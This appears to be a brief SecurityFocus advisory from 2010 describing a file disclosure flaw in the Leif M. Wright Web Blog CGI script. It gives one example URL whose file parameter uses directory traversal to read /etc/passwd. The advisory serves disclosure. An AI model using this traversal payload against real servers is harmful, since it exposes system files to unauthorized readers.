Leif M. Wright Web Blog File Disclosure Vulnerability

This issue may be exploited with a web browser. The following example was provided:

http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus